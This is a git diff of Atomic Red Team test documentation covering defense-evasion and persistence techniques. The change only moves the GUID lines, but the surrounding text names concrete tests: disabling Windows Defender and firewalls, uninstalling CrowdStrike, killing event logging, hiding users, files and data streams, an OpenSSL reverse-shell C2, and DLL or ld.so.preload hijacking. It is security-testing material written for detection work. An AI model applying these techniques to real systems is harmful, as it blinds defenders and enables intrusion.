+**auto_generated_guid:** 6b8df440-51ec-4d53-bf83-899591c9b5d7
+
+
+
@@ -635,15 +665,17 @@ Set-MpPreference -DisableBlockAtFirstSeen 0
## Atomic Test #16 - Tamper with Windows Defender Command Prompt
-
-auto_generated_guid: aa875ed4-8935-47e2-b2c5-6ec00ab220d2
-
Attempting to disable scheduled scanning and other parts of windows defender atp. These commands must be run as System, so they still fail as administrator. However, adversaries do attempt to perform this action so monitoring for these command lines can help alert to other bad things going on. Upon execution, "Access Denied" will be displayed twice and the WinDefend service status will be displayed.
+
**Supported Platforms:** Windows
+**auto_generated_guid:** aa875ed4-8935-47e2-b2c5-6ec00ab220d2
+
+
+
@@ -670,14 +702,16 @@ sc config WinDefend start=enabled >nul 2>&1
## Atomic Test #17 - Tamper with Windows Defender Registry
-
-auto_generated_guid: 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45
-
Disable Windows Defender from starting after a reboot. Upen execution, if the computer is rebooted the entire Virus and Threat protection window in Settings will be grayed out and have no info.
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45
+
+
+
@@ -701,17 +735,19 @@ Set-ItemProperty "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name Disa
## Atomic Test #18 - Disable Microsoft Office Security Features
-
-auto_generated_guid: 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7
-
Gorgon group may disable Office security features so that their code can run. Upon execution, an external document will not show any warning before editing the document. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7
+
+
+
@@ -742,17 +778,19 @@ Remove-Item -Path "HKCU:\Software\Microsoft\Office\16.0\Excel\Security\Protected
## Atomic Test #19 - Remove Windows Defender Definition Files
-
-auto_generated_guid: 3d47daaa-2f56-43e0-94cc-caf5d8d52a68
-
Removing definition files would cause ATP to not fire for AntiMalware. Check MpCmdRun.exe man page for info on all arguments. On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the command will say completed. https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 3d47daaa-2f56-43e0-94cc-caf5d8d52a68
+
+
+
@@ -772,13 +810,15 @@ https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-
## Atomic Test #20 - Stop and Remove Arbitrary Security Windows Service
-
-auto_generated_guid: ae753dda-0f15-4af6-a168-b9ba16143143
-
Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
+
**Supported Platforms:** Windows
+**auto_generated_guid:** ae753dda-0f15-4af6-a168-b9ba16143143
+
+
+
#### Inputs:
@@ -804,13 +844,15 @@ Remove-Service -Name #{service_name}
## Atomic Test #21 - Uninstall Crowdstrike Falcon on Windows
-
-auto_generated_guid: b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297
-
Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
+
**Supported Platforms:** Windows
+**auto_generated_guid:** b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297
+
+
+
#### Inputs:
@@ -835,15 +877,17 @@ if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet
## Atomic Test #22 - Tamper with Windows Defender Evade Scanning -Folder
-
-auto_generated_guid: 0b19f4ee-de90-4059-88cb-63c800c683ed
-
Malware can exclude a specific path from being scanned and evading detection. Upon successul execution, the file provided should be on the list of excluded path. To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 0b19f4ee-de90-4059-88cb-63c800c683ed
+
+
+
#### Inputs:
@@ -874,15 +918,17 @@ Remove-MpPreference -ExclusionPath $excludedpath
## Atomic Test #23 - Tamper with Windows Defender Evade Scanning -Extension
-
-auto_generated_guid: 315f4be6-2240-4552-b3e1-d1047f5eecea
-
Malware can exclude specific extensions from being scanned and evading detection. Upon successful execution, the extension(s) should be on the list of excluded extensions. To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 315f4be6-2240-4552-b3e1-d1047f5eecea
+
+
+
#### Inputs:
@@ -913,15 +959,17 @@ Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
## Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process
-
-auto_generated_guid: a123ce6a-3916-45d6-ba9c-7d4081315c27
-
Malware can exclude specific processes from being scanned and evading detection. Upon successful execution, the process(es) should be on the list of excluded processes. To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess."
+
**Supported Platforms:** Windows
+**auto_generated_guid:** a123ce6a-3916-45d6-ba9c-7d4081315c27
+
+
+
#### Inputs:
diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md
index 01ba57e2..213de5a4 100644
--- a/atomics/T1562.002/T1562.002.md
+++ b/atomics/T1562.002/T1562.002.md
@@ -18,16 +18,18 @@ Adversaries may targeting system-wide logging or just that of a particular appli
## Atomic Test #1 - Disable Windows IIS HTTP Logging
-
-auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db
-
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked. Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 69435dcf-c66f-4ec0-a8b1-82beb76b34db
+
+
+
#### Inputs:
@@ -58,13 +60,15 @@ if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
## Atomic Test #2 - Kill Event Log Service Threads
-
-auto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd
-
Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 41ac52ba-5d5e-40c0-b267-573ed90489bd
+
+
+
@@ -96,14 +100,16 @@ Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore
## Atomic Test #3 - Impair Windows Audit Log Policy
-
-auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8
-
Disables the windows audit policy to prevent key host based telemetry being written into the event logs. [Solarigate example](https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/)
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 5102a3a7-e2d7-4129-9e45-f483f2e0eea8
+
+
+
@@ -131,13 +137,15 @@ auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable
## Atomic Test #4 - Clear Windows Audit Policy Config
-
-auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6
-
Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 913c0e4e-4b37-4b78-ad0b-90e7b25010f6
+
+
+
diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md
index 6a66d737..d081df79 100644
--- a/atomics/T1562.003/T1562.003.md
+++ b/atomics/T1562.003/T1562.003.md
@@ -18,13 +18,15 @@ On Windows systems, the PSReadLine module tracks commands used in a
## Atomic Test #1 - Disable history collection
-
-auto_generated_guid: 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
-
Disables history collection in shells
+
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
+
+
+
#### Inputs:
@@ -50,16 +52,18 @@ export HISTCONTROL=ignoreboth
## Atomic Test #2 - Mac HISTCONTROL
-
-auto_generated_guid: 468566d5-83e5-40c1-b338-511e1659628d
-
The HISTCONTROL variable is set to ignore (not write to the history file) command that are a duplicate of something already in the history and commands that start with a space. This atomic sets this variable in the current session and also writes it to the current user's ~/.bash_profile so that it will apply to all future settings as well. https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcontrol
+
**Supported Platforms:** macOS, Linux
+**auto_generated_guid:** 468566d5-83e5-40c1-b338-511e1659628d
+
+
+
#### Run it with these steps!
diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md
index f9e8b9f6..27d556d3 100644
--- a/atomics/T1562.004/T1562.004.md
+++ b/atomics/T1562.004/T1562.004.md
@@ -24,13 +24,15 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
## Atomic Test #1 - Disable firewall
-
-auto_generated_guid: 80f5e701-f7a4-4d06-b140-26c8efd1b6b4
-
Disables the firewall
+
**Supported Platforms:** Linux
+**auto_generated_guid:** 80f5e701-f7a4-4d06-b140-26c8efd1b6b4
+
+
+
#### Inputs:
@@ -60,14 +62,16 @@ Disables the firewall
## Atomic Test #2 - Disable Microsoft Defender Firewall
-
-auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f
-
Disables the Microsoft Defender Firewall for the current profile. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 88d05800-a5e4-407e-9b53-ece4174f197f
+
+
+
@@ -91,14 +95,16 @@ netsh advfirewall set currentprofile state on >nul 2>&1
## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry
-
-auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
-
Disables the Microsoft Defender Firewall for the public profile via registry Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+
**Supported Platforms:** Windows
+**auto_generated_guid:** afedc8c4-038c-4d82-b3e5-623a95f8a612
+
+
+
@@ -122,14 +128,16 @@ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Param
## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall
-
-auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1
-
Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services...
+
**Supported Platforms:** Windows
+**auto_generated_guid:** d9841bf8-f161-4c73-81e9-fd773a5ff8c1
+
+
+
@@ -154,15 +162,17 @@ netsh advfirewall reset >nul 2>&1
## Atomic Test #5 - Opening ports for proxy - HARDRAIN
-
-auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80
-
This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying. reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 15e57006-79dd-46df-9bf9-31bc24fb5a80
+
+
+
@@ -186,13 +196,15 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp
## Atomic Test #6 - Open a local port through Windows Firewall to any profile
-
-auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed
-
This test will attempt to open a local port defined by input arguments to any profile
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 9636dd6e-7599-40d2-8eee-ac16434f35ed
+
+
+
#### Inputs:
@@ -221,13 +233,15 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null
## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location
-
-auto_generated_guid: 6f5822d2-d38d-4f48-9bfc-916607ff6b8c
-
This test will attempt to allow an executable through the system firewall located in the Users directory
+
**Supported Platforms:** Windows
+**auto_generated_guid:** 6f5822d2-d38d-4f48-9bfc-916607ff6b8c
+
+
+
#### Inputs:
diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md
index c4da8863..1db3c799 100644
--- a/atomics/T1562.006/T1562.006.md
+++ b/atomics/T1562.006/T1562.006.md
@@ -16,13 +16,15 @@ In the case of network-based reporting of indicators, an adversary may block tra
## Atomic Test #1 - Auditing Configuration Changes on Linux Host
-
-auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
-
Emulates modification of auditd configuration files
+
**Supported Platforms:** Linux
+**auto_generated_guid:** 212cfbcf-4770-4980-bc21-303e37abd0e3
+
+
+
#### Inputs:
@@ -63,13 +65,15 @@ sed -i '$ d' /etc/#{libaudit_config_file_name}
## Atomic Test #2 - Logging Configuration Changes on Linux Host
-
-auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
-
Emulates modification of syslog configuration.
+
**Supported Platforms:** Linux
+**auto_generated_guid:** 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
+
+
+
#### Inputs:
diff --git a/atomics/T1563.002/T1563.002.md b/atomics/T1563.002/T1563.002.md
index 766f1007..51534980 100644
--- a/atomics/T1563.002/T1563.002.md
+++ b/atomics/T1563.002/T1563.002.md
@@ -12,13 +12,15 @@ Adversaries may perform RDP session hijacking which involves stealing a legitima
## Atomic Test #1 - RDP hijacking
-
-auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46
-
[RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
+
**Supported Platforms:** Windows
+**auto_generated_guid:** a37ac520-b911-458e-8aed-c5f1576d9f46
+
+
+
#### Inputs:
diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md
index 33358e45..35dbb5bc 100644
--- a/atomics/T1564.001/T1564.001.md
+++ b/atomics/T1564.001/T1564.001.md
@@ -28,13 +28,15 @@ Adversaries can use this to their advantage to hide files and folders anywhere o
## Atomic Test #1 - Create a hidden file in a hidden directory
-
-auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be
-
Creates a hidden file inside a hidden directory
+
**Supported Platforms:** Linux, macOS
+**auto_generated_guid:** 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be
+
+
+
@@ -59,13 +61,15 @@ rm -rf /var/tmp/.hidden-directory/
## Atomic Test #2 - Mac Hidden file
-
-auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9
-
Hide a file on MacOS
+
**Supported Platforms:** macOS
+**auto_generated_guid:** cddb9098-3b47-4e01-9d3b-6f5f323288a9
+
+
+
@@ -85,14 +89,16 @@ xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF
## Atomic Test #3 - Create Windows System File with Attrib
-
-auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32
-
Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details and observe that the Attributes are "SA" for System and Archive.
+
**Supported Platforms:** Windows
+**auto_generated_guid:** f70974c8-c094-4574-b542-2c545af95a32
+
+
+
#### Inputs:
@@ -133,14 +139,16 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #4 - Create Windows Hidden File with Attrib
-
-auto_generated_guid: dadb792e-4358-4d8d-9207-b771faa0daa5
-
Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file and observe that the Attributes are "SH" for System and Hidden.
+
**Supported Platforms:** Windows
+**auto_generated_guid:** dadb792e-4358-4d8d-9207-b771faa0daa5
+
+
+
#### Inputs:
@@ -181,13 +189,15 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #5 - Hidden files - -auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 - Requires Apple Dev Tools + **Supported Platforms:** macOS +**auto_generated_guid:** 3b7015f2-3144-4205-b799-b05580621379 + + + #### Inputs: @@ -212,13 +222,15 @@ setfile -a V #(unknown)
## Atomic Test #6 - Hide a Directory - -auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 - Hide a directory on MacOS + **Supported Platforms:** macOS +**auto_generated_guid:** b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 + + + @@ -243,13 +255,15 @@ rm /var/tmp/T1564.001_mac.txt
## Atomic Test #7 - Show all hidden files - -auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c - Show all hidden files on MacOS + **Supported Platforms:** macOS +**auto_generated_guid:** 9a1ec7da-b892-449f-ad68-67066d04380c + + + diff --git a/atomics/T1564.002/T1564.002.md b/atomics/T1564.002/T1564.002.md index eb504c9a..766c53ee 100644 --- a/atomics/T1564.002/T1564.002.md +++ b/atomics/T1564.002/T1564.002.md @@ -14,13 +14,15 @@ There is a property value in /Library/Preferences/com.apple.loginwindow ## Atomic Test #1 - Create Hidden User using UniqueID < 500 - -auto_generated_guid: 4238a7f0-a980-4fff-98a2-dfc0a363d507 - Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) + **Supported Platforms:** macOS +**auto_generated_guid:** 4238a7f0-a980-4fff-98a2-dfc0a363d507 + + + #### Inputs: @@ -49,13 +51,15 @@ sudo dscl . -delete /Users/#{user_name}
## Atomic Test #2 - Create Hidden User using IsHidden option - -auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 - Add a hidden user on macOS using IsHidden optoin + **Supported Platforms:** macOS +**auto_generated_guid:** de87ed7b-52c3-43fd-9554-730f695e7f31 + + + #### Inputs: diff --git a/atomics/T1564.003/T1564.003.md b/atomics/T1564.003/T1564.003.md index a554980d..cdc08590 100644 --- a/atomics/T1564.003/T1564.003.md +++ b/atomics/T1564.003/T1564.003.md @@ -16,14 +16,16 @@ Adversaries may abuse these functionalities to hide otherwise visible windows fr
## Atomic Test #1 - Hidden Window - -auto_generated_guid: f151ee37-9e2b-47e6-80e4-550b9f999b7a - Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden. Upon execution a hidden PowerShell window will launch calc.exe + **Supported Platforms:** Windows +**auto_generated_guid:** f151ee37-9e2b-47e6-80e4-550b9f999b7a + + + #### Inputs: diff --git a/atomics/T1564.004/T1564.004.md b/atomics/T1564.004/T1564.004.md index 1a314f8c..6ad1f5eb 100644 --- a/atomics/T1564.004/T1564.004.md +++ b/atomics/T1564.004/T1564.004.md @@ -18,17 +18,19 @@ Adversaries may store malicious data or binaries in file attribute metadata inst
## Atomic Test #1 - Alternate Data Streams (ADS) - -auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f4602364f4 - Execute from Alternate Streams [Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f) [Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/) + **Supported Platforms:** Windows +**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f4602364f4 + + + #### Inputs: @@ -62,14 +64,16 @@ esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
## Atomic Test #2 - Store file in Alternate Data Stream (ADS) - -auto_generated_guid: 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 - Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test + **Supported Platforms:** Windows +**auto_generated_guid:** 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 + + + #### Inputs: @@ -103,14 +107,16 @@ Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
## Atomic Test #3 - Create ADS command prompt - -auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb - Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp% folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1564.004_has_ads.txt:adstest.txt" + **Supported Platforms:** Windows +**auto_generated_guid:** 17e7637a-ddaf-4a82-8622-377e20de8fdb + + + #### Inputs: @@ -141,14 +147,16 @@ del #{file_name} >nul 2>&1
## Atomic Test #4 - Create ADS PowerShell - -auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 - Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname" in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder. + **Supported Platforms:** Windows +**auto_generated_guid:** 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 + + + #### Inputs: diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index 4bdd4e75..08e4f131 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md @@ -16,9 +16,6 @@ Adversaries may also attempt to hide artifacts associated with malicious behavio
## Atomic Test #1 - Extract binary files via VBA - -auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a - This module extracts a binary (calc.exe) from inside of another binary. In the wild maldoc authors will use this technique to hide binaries inside of files stored @@ -30,9 +27,14 @@ This sample contains a document inside of itself. Document 1 is the actual maldo is the same document without all the malicious code. Document 1 will copy Document 2 to the file system and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this oleObject.bin file is a payload that is parsed out and executed on the file system. + **Supported Platforms:** Windows +**auto_generated_guid:** 6afe288a-8a8b-4d33-a629-8d03ba9dad3a + + + @@ -76,13 +78,15 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Create a Hidden User Called "$" - -auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 - Creating a user with a username containing "$" + **Supported Platforms:** Windows +**auto_generated_guid:** 2ec63cc2-4975-41a6-bf09-dffdfb610778 + + + @@ -106,13 +110,15 @@ net user $ /DELETE 2>&1
## Atomic Test #3 - Create an "Administrator " user (with a space on the end) - -auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c - Creating a user with a username containing with a space on the end + **Supported Platforms:** Windows +**auto_generated_guid:** 5bb20389-39a5-4e99-9264-aeb92a55a85c + + + diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index 7a3de378..da4434af 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -14,15 +14,17 @@ There are many options for the attachment such as Microsoft Office documents, ex
## Atomic Test #1 - Download Phishing Attachment - VBScript - -auto_generated_guid: 114ccff9-ae6d-4547-9ead-4cd69f687306 - The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. File is downloaded to the %temp% folder. + **Supported Platforms:** Windows +**auto_generated_guid:** 114ccff9-ae6d-4547-9ead-4cd69f687306 + + + @@ -53,14 +55,16 @@ else{
## Atomic Test #2 - Word spawned a command shell and used an IP address in the command line - -auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f - Word spawning a command prompt then running a command with an IP address in the command line is an indiciator of malicious activity. Upon execution, CMD will be lauchned and ping 8.8.8.8 + **Supported Platforms:** Windows +**auto_generated_guid:** cbb6799a-425c-4f83-9194-5447a909d67f + + + #### Inputs: diff --git a/atomics/T1569.001/T1569.001.md b/atomics/T1569.001/T1569.001.md index 1c14ffe9..a4b90c7a 100644 --- a/atomics/T1569.001/T1569.001.md +++ b/atomics/T1569.001/T1569.001.md @@ -14,13 +14,15 @@ Running a command from launchctl is as simple as launchctl submit -l ## Atomic Test #1 - Launchctl - -auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 - Utilize launchctl + **Supported Platforms:** macOS +**auto_generated_guid:** 6fb61988-724e-4755-a595-07743749d4e2 + + + #### Inputs: diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md index 6015e492..7ecc1ec7 100644 --- a/atomics/T1569.002/T1569.002.md +++ b/atomics/T1569.002/T1569.002.md @@ -16,15 +16,17 @@ Adversaries may leverage these mechanisms to execute malicious content. This can
## Atomic Test #1 - Execute a Command as a Service - -auto_generated_guid: 2382dee2-a75f-49aa-9378-f52df6ed3fb1 - Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. Upon successful execution, cmd.exe create a new service using sc.exe create that will start powershell.exe to create a new file `art-marker.txt` + **Supported Platforms:** Windows +**auto_generated_guid:** 2382dee2-a75f-49aa-9378-f52df6ed3fb1 + + + #### Inputs: @@ -56,16 +58,18 @@ del C:\art-marker.txt >nul 2>&1
## Atomic Test #2 - Use PsExec to execute a command on a remote host - -auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c - Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments Will start a process on a remote host. Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). + **Supported Platforms:** Windows +**auto_generated_guid:** 873106b7-cfed-454b-8680-fa9f6400431c + + + #### Inputs: diff --git a/atomics/T1571/T1571.md b/atomics/T1571/T1571.md index a9aae7f5..3549804a 100644 --- a/atomics/T1571/T1571.md +++ b/atomics/T1571/T1571.md @@ -12,14 +12,16 @@
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell - -auto_generated_guid: 21fe622f-8e53-4b31-ba83-6d333c2583f4 - Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon execution, details about the successful port check will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 21fe622f-8e53-4b31-ba83-6d333c2583f4 + + + #### Inputs: @@ -45,13 +47,15 @@ Test-NetConnection -ComputerName #{domain} -port #{port}
## Atomic Test #2 - Testing usage of uncommonly used port - -auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 - Testing uncommonly used port utilizing telnet. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 5db21e1d-dd9c-4a50-b885-b1e748912767 + + + #### Inputs: diff --git a/atomics/T1573/T1573.md b/atomics/T1573/T1573.md index ef035415..ce3ca961 100644 --- a/atomics/T1573/T1573.md +++ b/atomics/T1573/T1573.md @@ -10,18 +10,20 @@
## Atomic Test #1 - OpenSSL C2 - -auto_generated_guid: 21caf58e-87ad-440c-a6b8-3ac259964003 - Thanks to @OrOneEqualsOne for this quick C2 method. This is to test to see if a C2 session can be established using an SSL socket. More information about this technique, including how to set up the listener, can be found here: https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443. + **Supported Platforms:** Windows +**auto_generated_guid:** 21caf58e-87ad-440c-a6b8-3ac259964003 + + + #### Inputs: diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md index dcc50b0e..10700bb9 100644 --- a/atomics/T1574.001/T1574.001.md +++ b/atomics/T1574.001/T1574.001.md @@ -16,16 +16,18 @@ If a search order-vulnerable program is configured to run at a higher privilege
## Atomic Test #1 - DLL Search Order Hijacking - amsi.dll - -auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 - Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. + **Supported Platforms:** Windows +**auto_generated_guid:** 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 + + + diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md index 10229d09..74667b1d 100644 --- a/atomics/T1574.002/T1574.002.md +++ b/atomics/T1574.002/T1574.002.md @@ -12,14 +12,16 @@ Side-loading takes advantage of the DLL search order used by the loader by posit
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary - -auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 - GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. Upon execution, calc.exe will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** 65526037-7079-44a9-bda1-2cb624838040 + + + #### Inputs: diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md index ec61d98f..45fef5aa 100644 --- a/atomics/T1574.006/T1574.006.md +++ b/atomics/T1574.006/T1574.006.md @@ -18,15 +18,17 @@ On macOS this behavior is conceptually the same as on Linux, differing only in h
## Atomic Test #1 - Shared Library Injection via /etc/ld.so.preload - -auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 - This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. + **Supported Platforms:** Linux +**auto_generated_guid:** 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + + + #### Inputs: @@ -68,15 +70,17 @@ gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
